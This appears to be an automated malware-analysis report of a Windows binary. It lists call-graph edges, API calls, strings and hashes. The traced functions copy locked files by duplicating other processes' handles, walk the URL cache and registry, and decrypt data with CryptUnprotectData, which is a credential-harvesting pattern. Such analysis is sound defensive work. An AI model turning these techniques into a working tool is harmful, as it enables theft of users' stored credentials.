6 API calls 38766->38770 38768 40aebe FindClose 38767->38768 38768->38766 38769->38447 38770->38769 38771->38332 38772->38311 38773->38407 38774->38388 38775->38388 38776->38421 38778 409c89 38777->38778 38778->38443 38779->38474 38781 413d39 38780->38781 38782 413d2f FreeLibrary 38780->38782 38783 40b633 free 38781->38783 38782->38781 38784 413d42 38783->38784 38785 40b633 free 38784->38785 38786 413d4a 38785->38786 38786->38301 38787->38304 38788->38357 38789->38371 38791 44db70 38790->38791 38792 40b6fc memset 38791->38792 38793 409c70 2 API calls 38792->38793 38794 40b732 wcsrchr 38793->38794 38795 40b743 38794->38795 38796 40b746 memset 38794->38796 38795->38796 38797 40b2cc 27 API calls 38796->38797 38798 40b76f 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 40b783 38799->38800 39850 409b98 GetFileAttributesW 38800->39850 38802 40b792 38803 40b7c2 38802->38803 38804 409c70 2 API calls 38802->38804 39851 40bb98 38803->39851 38806 40b7a5 38804->38806 38808 40b2cc 27 API calls 38806->38808 38812 40b7b2 38808->38812 38809 40b837 CloseHandle 38811 40b83e memset 38809->38811 38810 40b817 38813 409a45 3 API calls 38810->38813 39884 40a6e6 WideCharToMultiByte 38811->39884 38815 409d1f 6 API calls 38812->38815 38816 40b827 CopyFileW 38813->38816 38815->38803 38816->38811 38817 40b866 38818 444432 121 API calls 38817->38818 38820 40b879 38818->38820 38819 40bad5 38822 40baeb 38819->38822 38823 40bade DeleteFileW 38819->38823 38820->38819 38821 40b273 27 API calls 38820->38821 38824 40b89a 38821->38824 38825 40b04b ??3@YAXPAX 38822->38825 38823->38822 38826 438552 134 API calls 38824->38826 38827 40baf3 38825->38827 38828 40b8a4 38826->38828 38827->38381 38829 40bacd 38828->38829 38831 4251c4 137 API calls 38828->38831 38830 443d90 111 API calls 38829->38830 38830->38819 38854 40b8b8 38831->38854 38832 40bac6 39894 424f26 123 API calls 38832->39894 38833 40b8bd memset 39885 425413 17 API calls 38833->39885 38836 425413 17 API calls 38836->38854 38839 40a71b 
MultiByteToWideChar 38839->38854 38840 40a734 MultiByteToWideChar 38840->38854 38843 40b9b5 memcmp 38843->38854 38844 4099c6 2 API calls 38844->38854 38845 404423 38 API calls 38845->38854 38848 40bb3e memset memcpy 39895 40a734 MultiByteToWideChar 38848->39895 38849 4251c4 137 API calls 38849->38854 38851 40bb88 LocalFree 38851->38854 38854->38832 38854->38833 38854->38836 38854->38839 38854->38840 38854->38843 38854->38844 38854->38845 38854->38848 38854->38849 38855 40ba5f memcmp 38854->38855 39886 4253ef 16 API calls 38854->39886 39887 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38854->39887 39888 4253af 17 API calls 38854->39888 39889 4253cf 17 API calls 38854->39889 39890 447280 memset 38854->39890 39891 447960 memset memcpy memcpy memcpy 38854->39891 39892 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38854->39892 39893 447920 memcpy memcpy memcpy 38854->39893 38855->38854 38856->38383 38858 40aed1 38857->38858 38859 40aec7 FindClose 38857->38859 38858->38315 38859->38858 38861 4099d7 38860->38861 38862 4099da memcpy 38860->38862 38861->38862 38862->38366 38864 40b2cc 27 API calls 38863->38864 38865 44543f 38864->38865 38866 409d1f 6 API calls 38865->38866 38867 44544f 38866->38867 39979 409b98 GetFileAttributesW 38867->39979 38869 44545e 38870 445476 38869->38870 38871 40b6ef 253 API calls 38869->38871 38872 40b2cc 27 API calls 38870->38872 38871->38870 38873 445482 38872->38873 38874 409d1f 6 API calls 38873->38874 38875 445492 38874->38875 39980 409b98 GetFileAttributesW 38875->39980 38877 4454a1 38878 4454b9 38877->38878 38879 40b6ef 253 API calls 38877->38879 38878->38396 38879->38878 38880->38395 38881->38412 38882->38418 38883->38455 38884->38432 38885->38482 38886->38482 38887->38463 38888->38493 38889->38495 38890->38497 38892 414c2e 17 API calls 38891->38892 38893 40c2ae 38892->38893 38963 40c1d3 38893->38963 38898 40c3be 38915 40a8ab 38898->38915 38899 40afcf 2 API calls 38900 40c2fd FindFirstUrlCacheEntryW 38899->38900 38901 40c3b6 38900->38901 
38902 40c31e wcschr 38900->38902 38903 40b04b ??3@YAXPAX 38901->38903 38904 40c331 38902->38904 38905 40c35e FindNextUrlCacheEntryW 38902->38905 38903->38898 38907 40a8ab 9 API calls 38904->38907 38905->38902 38906 40c373 GetLastError 38905->38906 38908 40c3ad FindCloseUrlCache 38906->38908 38909 40c37e 38906->38909 38910 40c33e wcschr 38907->38910 38908->38901 38911 40afcf 2 API calls 38909->38911 38910->38905 38912 40c34f 38910->38912 38913 40c391 FindNextUrlCacheEntryW 38911->38913 38914 40a8ab 9 API calls 38912->38914 38913->38902 38913->38908 38914->38905 39172 40a97a 38915->39172 38918 40a8cc 38918->38504 38919 40a8d0 7 API calls 38919->38918 39177 40b1ab free free 38920->39177 38922 40c3dd 38923 40b2cc 27 API calls 38922->38923 38924 40c3e7 38923->38924 39178 414592 RegOpenKeyExW 38924->39178 38926 40c3f4 38927 40c50e 38926->38927 38928 40c3ff 38926->38928 38942 405337 38927->38942 38929 40a9ce 4 API calls 38928->38929 38930 40c418 memset 38929->38930 39179 40aa1d 38930->39179 38933 40c471 38935 40c47a _wcsupr 38933->38935 38934 40c505 RegCloseKey 38934->38927 38936 40a8d0 7 API calls 38935->38936 38937 40c498 38936->38937 38938 40a8d0 7 API calls 38937->38938 38939 40c4ac memset 38938->38939 38940 40aa1d 38939->38940 38941 40c4e4 RegEnumValueW 38940->38941 38941->38934 38941->38935 39181 405220 38942->39181 38946 4099c6 2 API calls 38945->38946 38947 40a714 _wcslwr 38946->38947 38948 40c634 38947->38948 39238 405361 38948->39238 38951 40c65c wcslen 39241 4053b6 39 API calls 38951->39241 38952 40c71d wcslen 38952->38513 38954 40c677 38955 40c713 38954->38955 39242 40538b 39 API calls 38954->39242 39244 4053df 39 API calls 38955->39244 38958 40c6a5 38958->38955 38959 40c6a9 memset 38958->38959 38960 40c6d3 38959->38960 39243 40c589 44 API calls 38960->39243 38962->38511 38964 40ae18 9 API calls 38963->38964 38970 40c210 38964->38970 38965 40ae51 9 API calls 38965->38970 38966 40c264 38967 40aebe FindClose 38966->38967 38969 40c26f 38967->38969 38968 40add4 2 
API calls 38968->38970 38975 40e5ed memset memset 38969->38975 38970->38965 38970->38966 38970->38968 38971 40c231 _wcsicmp 38970->38971 38972 40c1d3 35 API calls 38970->38972 38971->38970 38973 40c248 38971->38973 38972->38970 38988 40c084 22 API calls 38973->38988 38976 414c2e 17 API calls 38975->38976 38977 40e63f 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 40e658 38978->38979 38989 409b98 GetFileAttributesW 38979->38989 38981 40e667 38982 40e680 38981->38982 38983 409d1f 6 API calls 38981->38983 38990 409b98 GetFileAttributesW 38982->38990 38983->38982 38985 40e68f 38986 40c2d8 38985->38986 38991 40e4b2 38985->38991 38986->38898 38986->38899 38988->38970 38989->38981 38990->38985 39012 40e01e 38991->39012 38993 40e593 38994 40e5b0 38993->38994 38995 40e59c DeleteFileW 38993->38995 38996 40b04b ??3@YAXPAX 38994->38996 38995->38994 38998 40e5bb 38996->38998 38997 40e521 38997->38993 39035 40e175 38997->39035 39000 40e5c4 CloseHandle 38998->39000 39001 40e5cc 38998->39001 39000->39001 39003 40b633 free 39001->39003 39002 40e573 39004 40e584 39002->39004 39005 40e57c CloseHandle 39002->39005 39006 40e5db 39003->39006 39078 40b1ab free free 39004->39078 39005->39004 39008 40b633 free 39006->39008 39009 40e5e3 39008->39009 39009->38986 39011 40e540 39011->39002 39055 40e2ab 39011->39055 39079 406214 39012->39079 39015 40e16b 39015->38997 39018 40afcf 2 API calls 39019 40e08d OpenProcess 39018->39019 39020 40e0a4 GetCurrentProcess DuplicateHandle 39019->39020 39024 40e152 39019->39024 39021 40e0d0 GetFileSize 39020->39021 39022 40e14a CloseHandle 39020->39022 39115 409a45 GetTempPathW 39021->39115 39022->39024 39023 40e160 39027 40b04b ??3@YAXPAX 39023->39027 39024->39023 39026 406214 22 API calls 39024->39026 39026->39023 39027->39015 39028 40e0ea 39118 4096dc CreateFileW 39028->39118 39030 40e0f1 CreateFileMappingW 39031 40e140 CloseHandle CloseHandle 39030->39031 39032 40e10b MapViewOfFile 39030->39032 39031->39022 39033 40e13b CloseHandle 39032->39033 
39034 40e11f WriteFile UnmapViewOfFile 39032->39034 39033->39031 39034->39033 39036 40e18c 39035->39036 39119 406b90 39036->39119 39039 40e1a7 memset 39045 40e1e8 39039->39045 39040 40e299 39151 4069a3 39040->39151 39046 40e283 39045->39046 39047 40dd50 _wcsicmp 39045->39047 39053 40e244 _snwprintf 39045->39053 39129 406e8f 39045->39129 39158 40742e 8 API calls 39045->39158 39159 40aae3 wcslen wcslen _memicmp 39045->39159 39160 406b53 SetFilePointerEx ReadFile 39045->39160 39048 40e291 39046->39048 39049 40e288 free 39046->39049 39047->39045 39050 40aa04 free 39048->39050 39049->39048 39050->39040 39054 40a8d0 7 API calls 39053->39054 39054->39045 39056 40e2c2 39055->39056 39057 406b90 11 API calls 39056->39057 39058 40e2d3 39057->39058 39059 40e4a0 39058->39059 39061 406e8f 13 API calls 39058->39061 39064 40e489 39058->39064 39067 40dd50 _wcsicmp 39058->39067 39073 40e3e0 memcpy 39058->39073 39074 40e3fb memcpy 39058->39074 39075 40e3b3 wcschr 39058->39075 39076 40e416 memcpy 39058->39076 39077 40e431 memcpy 39058->39077 39161 40dd50 _wcsicmp 39058->39161 39170 40742e 8 API calls 39058->39170 39171 406b53 SetFilePointerEx ReadFile 39058->39171 39060 4069a3 2 API calls 39059->39060 39062 40e4ab 39060->39062 39061->39058 39062->39011 39065 40aa04 free 39064->39065 39066 40e491 39065->39066 39066->39059 39068 40e497 free 39066->39068 39067->39058 39068->39059 39070 40e376 memset 39162 40aa29 39070->39162 39073->39058 39074->39058 39075->39058 39076->39058 39077->39058 39078->38993 39080 406294 CloseHandle 39079->39080 39081 406224 39080->39081 39082 4096c3 CreateFileW 39081->39082 39083 40622d 39082->39083 39084 406281 GetLastError 39083->39084 39085 40a2ef ReadFile 39083->39085 39087 40625a 39084->39087 39086 406244 39085->39086 39086->39084 39088 40624b 39086->39088 39087->39015 39090 40dd85 memset 39087->39090 39088->39087 39089 406777 19 API calls 39088->39089 39089->39087 39091 409bca GetModuleFileNameW 39090->39091 39092 40ddbe CreateFileW 39091->39092 39095 
40ddf1 39092->39095 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39093->39095 39094 41352f 9 API calls 39094->39095 39095->39093 39095->39094 39096 40de0b NtQuerySystemInformation 39095->39096 39097 40de3b CloseHandle GetCurrentProcessId 39095->39097 39096->39095 39098 40de54 39097->39098 39099 413d4c 46 API calls 39098->39099 39107 40de88 39099->39107 39100 40e00c 39101 413d29 free FreeLibrary 39100->39101 39102 40e014 39101->39102 39102->39015 39102->39018 39103 40dea9 _wcsicmp 39104 40dee7 OpenProcess 39103->39104 39105 40debd _wcsicmp 39103->39105 39104->39107 39105->39104 39106 40ded0 _wcsicmp 39105->39106 39106->39104 39106->39107 39107->39100 39107->39103 39108 40dfef CloseHandle 39107->39108 39109 40df78 39107->39109 39110 40df23 GetCurrentProcess DuplicateHandle 39107->39110 39113 40df8f CloseHandle 39107->39113 39108->39107 39109->39108 39109->39113 39114 40dfae _wcsicmp 39109->39114 39110->39107 39111 40df4c memset 39110->39111 39112 41352f 9 API calls 39111->39112 39112->39107 39113->39109 39114->39107 39114->39109 39116 409a74 GetTempFileNameW 39115->39116 39117 409a66 GetWindowsDirectoryW 39115->39117 39116->39028 39117->39116 39118->39030 39120 406bd5 39119->39120 39121 406bad 39119->39121 39123 4066bf free malloc memcpy free free 39120->39123 39128 406c0f 39120->39128 39121->39120 39122 406bba _wcsicmp 39121->39122 39122->39120 39122->39121 39124 406be5 39123->39124 39125 40afcf ??2@YAPAXI ??3@YAXPAX 39124->39125 39124->39128 39126 406bff 39125->39126 39127 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39126->39127 39127->39128 39128->39039 39128->39040 39131 406ed1 39129->39131 39130 407424 39130->39045 39131->39130 39132 40b633 free 39131->39132 39140 406f4e 39132->39140 39133 406f73 memset 39133->39140 39134 407080 free 39134->39140 39135 40718b 39137 4069df memcpy 39135->39137 39149 40730b 39135->39149 39136 4099f4 malloc memcpy free 39136->39140 39150 4071f1 39137->39150 39138 4069df memcpy 39138->39140 39139 4069df memcpy 39142 4070d4 
39139->39142 39140->39133 39140->39134 39140->39136 39140->39138 39141 406aa2 memcpy 39140->39141 39140->39142 39143 406a10 memcpy 39140->39143 39141->39140 39142->39130 39142->39135 39142->39139 39145 40717b 39142->39145 39143->39140 39144 4069df memcpy 39144->39150 39146 4069df memcpy 39145->39146 39146->39135 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39130 39149->39147 39149->39148 39150->39144 39150->39149 39152 4069c4 ??3@YAXPAX 39151->39152 39153 4069af 39152->39153 39154 40b633 free 39153->39154 39155 4069ba 39154->39155 39156 40b04b ??3@YAXPAX 39155->39156 39157 4069c2 39156->39157 39157->39011 39158->39045 39159->39045 39160->39045 39161->39070 39163 40aa33 39162->39163 39164 40aa63 39162->39164 39165 40aa44 39163->39165 39166 40aa38 wcslen 39163->39166 39164->39058 39167 40a9ce malloc memcpy free free 39165->39167 39166->39165 39168 40aa4d 39167->39168 39168->39164 39169 40aa51 memcpy 39168->39169 39169->39164 39170->39058 39171->39058 39176 40a980 39172->39176 39173 40a8bb 39173->38918 39173->38919 39174 40a995 _wcsicmp 39174->39176 39175 40a99c wcscmp 39175->39176 39176->39173 39176->39174 39176->39175 39177->38922 39178->38926 39180 40aa23 RegEnumValueW 39179->39180 39180->38933 39180->38934 39182 405335 39181->39182 39183 40522a 39181->39183 39182->38513 39184 40b2cc 27 API calls 39183->39184 39185 405234 39184->39185 39186 40a804 8 API calls 39185->39186 39187 40523a 39186->39187 39226 40b273 39187->39226 39189 405248 _mbscpy _mbscat GetProcAddress 39190 40b273 27 API calls 39189->39190 39191 405279 39190->39191 39229 405211 GetProcAddress 39191->39229 39193 405282 39194 40b273 27 API calls 39193->39194 39195 40528f 39194->39195 39230 405211 GetProcAddress 39195->39230 39197 405298 39198 40b273 27 API calls 39197->39198 39199 4052a5 39198->39199 39231 405211 GetProcAddress 39199->39231 39201 4052ae 39202 40b273 27 API calls 39201->39202 39203 4052bb 39202->39203 39232 405211 GetProcAddress 
39203->39232 39205 4052c4 39206 40b273 27 API calls 39205->39206 39207 4052d1 39206->39207 39233 405211 GetProcAddress 39207->39233 39209 4052da 39210 40b273 27 API calls 39209->39210 39211 4052e7 39210->39211 39234 405211 GetProcAddress 39211->39234 39213 4052f0 39214 40b273 27 API calls 39213->39214 39215 4052fd 39214->39215 39235 405211 GetProcAddress 39215->39235 39217 405306 39218 40b273 27 API calls 39217->39218 39219 405313 39218->39219 39227 40b58d 27 API calls 39226->39227 39228 40b18c 39227->39228 39228->39189 39229->39193 39230->39197 39231->39201 39232->39205 39233->39209 39234->39213 39235->39217 39239 405220 39 API calls 39238->39239 39240 405369 39239->39240 39240->38951 39240->38952 39241->38954 39242->38958 39243->38955 39244->38952 39246 40440c FreeLibrary 39245->39246 39247 40436d 39246->39247 39248 40a804 8 API calls 39247->39248 39249 404377 39248->39249 39250 404383 39249->39250 39251 404405 39249->39251 39252 40b273 27 API calls 39250->39252 39251->38523 39251->38524 39251->38525 39253 40438d GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 4043a7 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 4043ba GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4043ce GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4043e2 GetProcAddress 39260->39261 39262 4043f1 39261->39262 39263 4043f7 39262->39263 39264 40440c FreeLibrary 39262->39264 39263->39251 39264->39251 39266 404413 FreeLibrary 39265->39266 39267 40441e 39265->39267 39266->39267 39267->38540 39268->38536 39270 40447e 39269->39270 39271 40442e 39269->39271 39272 404485 CryptUnprotectData 39270->39272 39273 40449c 39270->39273 39274 40b2cc 27 API calls 39271->39274 39272->39273 39273->38536 39275 404438 39274->39275 39276 40a804 8 API calls 39275->39276 39277 40443e 39276->39277 39278 404445 39277->39278 39279 404467 39277->39279 39280 40b273 27 API calls 39278->39280 39279->39270 39282 404475 
FreeLibrary 39279->39282 39281 40444f GetProcAddress 39280->39281 39281->39279 39283 404460 39281->39283 39282->39270 39283->39279 39285 4135f6 39284->39285 39286 4135eb FreeLibrary 39284->39286 39285->38543 39286->39285 39288 4449c4 39287->39288 39289 444a52 39287->39289 39290 40b2cc 27 API calls 39288->39290 39289->38560 39289->38561 39291 4449cb 39290->39291 39292 40a804 8 API calls 39291->39292 39293 4449d1 39292->39293 39294 40b273 27 API calls 39293->39294 39295 4449dc GetProcAddress 39294->39295 39296 40b273 27 API calls 39295->39296 39297 4449f3 GetProcAddress 39296->39297 39298 40b273 27 API calls 39297->39298 39299 444a04 GetProcAddress 39298->39299 39308->38571 39309->38571 39310->38571 39311->38571 39312->38562 39314 403a29 39313->39314 39328 403bed memset memset 39314->39328 39316 403ae7 39341 40b1ab free free 39316->39341 39318 403a3f memset 39322 403a2f 39318->39322 39319 403aef 39319->38579 39320 40a8d0 7 API calls 39320->39322 39321 409d1f 6 API calls 39321->39322 39322->39316 39322->39318 39322->39320 39322->39321 39323 409b98 GetFileAttributesW 39322->39323 39323->39322 39325 40a051 GetFileTime CloseHandle 39324->39325 39326 4039ca CompareFileTime 39324->39326 39325->39326 39326->38579 39327->38578 39329 414c2e 17 API calls 39328->39329 39330 403c38 39329->39330 39331 409719 2 API calls 39330->39331 39332 403c3f wcscat 39331->39332 39333 414c2e 17 API calls 39332->39333 39334 403c61 39333->39334 39335 409719 2 API calls 39334->39335 39336 403c68 wcscat 39335->39336 39342 403af5 39336->39342 39339 403af5 20 API calls 39340 403c95 39339->39340 39340->39322 39341->39319 39343 403b02 39342->39343 39344 40ae18 9 API calls 39343->39344 39352 403b37 39344->39352 39345 403bdb 39346 40aebe FindClose 39345->39346 39347 403be6 39346->39347 39347->39339 39348 40ae18 9 API calls 39348->39352 39349 40ae51 9 API calls 39349->39352 39350 40add4 wcscmp wcscmp 39350->39352 39351 40aebe FindClose 39351->39352 39352->39345 39352->39348 39352->39349 39352->39350 
39352->39351 39353 40a8d0 7 API calls 39352->39353 39353->39352 39355 409d1f 6 API calls 39354->39355 39356 404190 39355->39356 39369 409b98 GetFileAttributesW 39356->39369 39358 40419c 39359 4041a7 6 API calls 39358->39359 39360 40435c 39358->39360 39361 40424f 39359->39361 39360->38605 39361->39360 39363 40425e memset 39361->39363 39365 409d1f 6 API calls 39361->39365 39366 40a8ab 9 API calls 39361->39366 39370 414842 39361->39370 39363->39361 39364 404296 wcscpy 39363->39364 39364->39361 39365->39361 39367 4042b6 memset memset _snwprintf wcscpy 39366->39367 39367->39361 39368->38603 39369->39358 39373 41443e 39370->39373 39372 414866 39372->39361 39374 41444b 39373->39374 39375 414451 39374->39375 39376 4144a3 GetPrivateProfileStringW 39374->39376 39377 414491 39375->39377 39378 414455 wcschr 39375->39378 39376->39372 39380 414495 WritePrivateProfileStringW 39377->39380 39378->39377 39379 414463 _snwprintf 39378->39379 39379->39380 39380->39372 39381->38609 39383 40b2cc 27 API calls 39382->39383 39384 409615 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 409625 39385->39386 39411 409b98 GetFileAttributesW 39386->39411 39388 409634 39389 409648 39388->39389 39412 4091b8 memset 39388->39412 39391 40b2cc 27 API calls 39389->39391 39394 408801 39389->39394 39392 40965d 39391->39392 39393 409d1f 6 API calls 39392->39393 39395 40966d 39393->39395 39394->38612 39394->38639 39464 409b98 GetFileAttributesW 39395->39464 39397 40967c 39397->39394 39398 409681 39397->39398 39465 409529 72 API calls 39398->39465 39400 409690 39400->39394 39411->39388 39466 40a6e6 WideCharToMultiByte 39412->39466 39414 409202 39467 444432 39414->39467 39417 40b273 27 API calls 39418 409236 39417->39418 39513 438552 39418->39513 39444 40951d 39444->39389 39464->39397 39465->39400 39466->39414 39468 4438b5 11 API calls 39467->39468 39469 44444c 39468->39469 39470 409215 39469->39470 39563 415a6d 39469->39563 39470->39417 39470->39444 39472 4442e6 11 API calls 39474 44469e 39472->39474 
39473 444486 39475 4444b9 memcpy 39473->39475 39512 4444a4 39473->39512 39474->39470 39477 443d90 111 API calls 39474->39477 39567 415258 39475->39567 39477->39470 39478 444524 39479 444541 39478->39479 39480 44452a 39478->39480 39570 444316 39479->39570 39481 416935 16 API calls 39480->39481 39481->39512 39512->39472 39684 438460 39513->39684 39564 415a77 39563->39564 39565 415a8d 39564->39565 39566 415a7e memset 39564->39566 39565->39473 39566->39565 39568 4438b5 11 API calls 39567->39568 39569 41525d 39568->39569 39569->39478 39571 444328 39570->39571 39696 41703f 39684->39696 39686 43847a 39687 43848a 39686->39687 39688 43847e 39686->39688 39703 438270 39687->39703 39733 4446ea 11 API calls 39688->39733 39695 438488 39697 417044 39696->39697 39698 41705c 39696->39698 39700 416760 11 API calls 39697->39700 39702 417055 39697->39702 39699 417075 39698->39699 39701 41707a 11 API calls 39698->39701 39699->39686 39700->39702 39701->39697 39702->39686 39704 415a91 memset 39703->39704 39733->39695 39834 413f4f 39807->39834 39810 413f37 K32GetModuleFileNameExW 39811 413f4a 39810->39811 39811->38672 39813 413969 wcscpy 39812->39813 39814 41396c wcschr 39812->39814 39824 413a3a 39813->39824 39814->39813 39816 41398e 39814->39816 39839 4097f7 wcslen wcslen _memicmp 39816->39839 39818 41399a 39819 4139a4 memset 39818->39819 39820 4139e6 39818->39820 39840 409dd5 GetWindowsDirectoryW wcscpy 39819->39840 39822 413a31 wcscpy 39820->39822 39823 4139ec memset 39820->39823 39822->39824 39841 409dd5 GetWindowsDirectoryW wcscpy 39823->39841 39824->38672 39825 4139c9 wcscpy wcscat 39825->39824 39827 413a11 memcpy wcscat 39827->39824 39829 413cb0 GetModuleHandleW 39828->39829 39830 413cda 39828->39830 39829->39830 39833 413cbf GetProcAddress 39829->39833 39831 413ce3 GetProcessTimes 39830->39831 39832 413cf6 39830->39832 39831->38674 39832->38674 39833->39830 39835 413f2f 39834->39835 39836 413f54 39834->39836 39835->39810 39835->39811 39837 40a804 8 API calls 39836->39837 39838 

Control-flow Graph for function 0040DD85 (graph rendering omitted; legend: • Executed • Not Executed)
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph for function 00413D4C (graph rendering omitted; legend: • Executed • Not Executed)
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                                                                                                    • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Control-flow Graph (function 0040B58D-0040B632; the rendered graph is not reproduced. Basic blocks from the graph data: 40b58d-40b59e; 40b5a4-40b5c0 GetModuleHandleW, FindResourceW; 40b5c2-40b5ce LoadResource; 40b5d0-40b5e5 SizeofResource, LockResource; 40b5f1-40b629 call 40afcf, memcpy, call 40b4d3, call 40b3c1, call 40b04b; exit 40b62e-40b632)
APIs
• GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: AE$BIN
• API String ID: 1668488027-3931574542
• Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
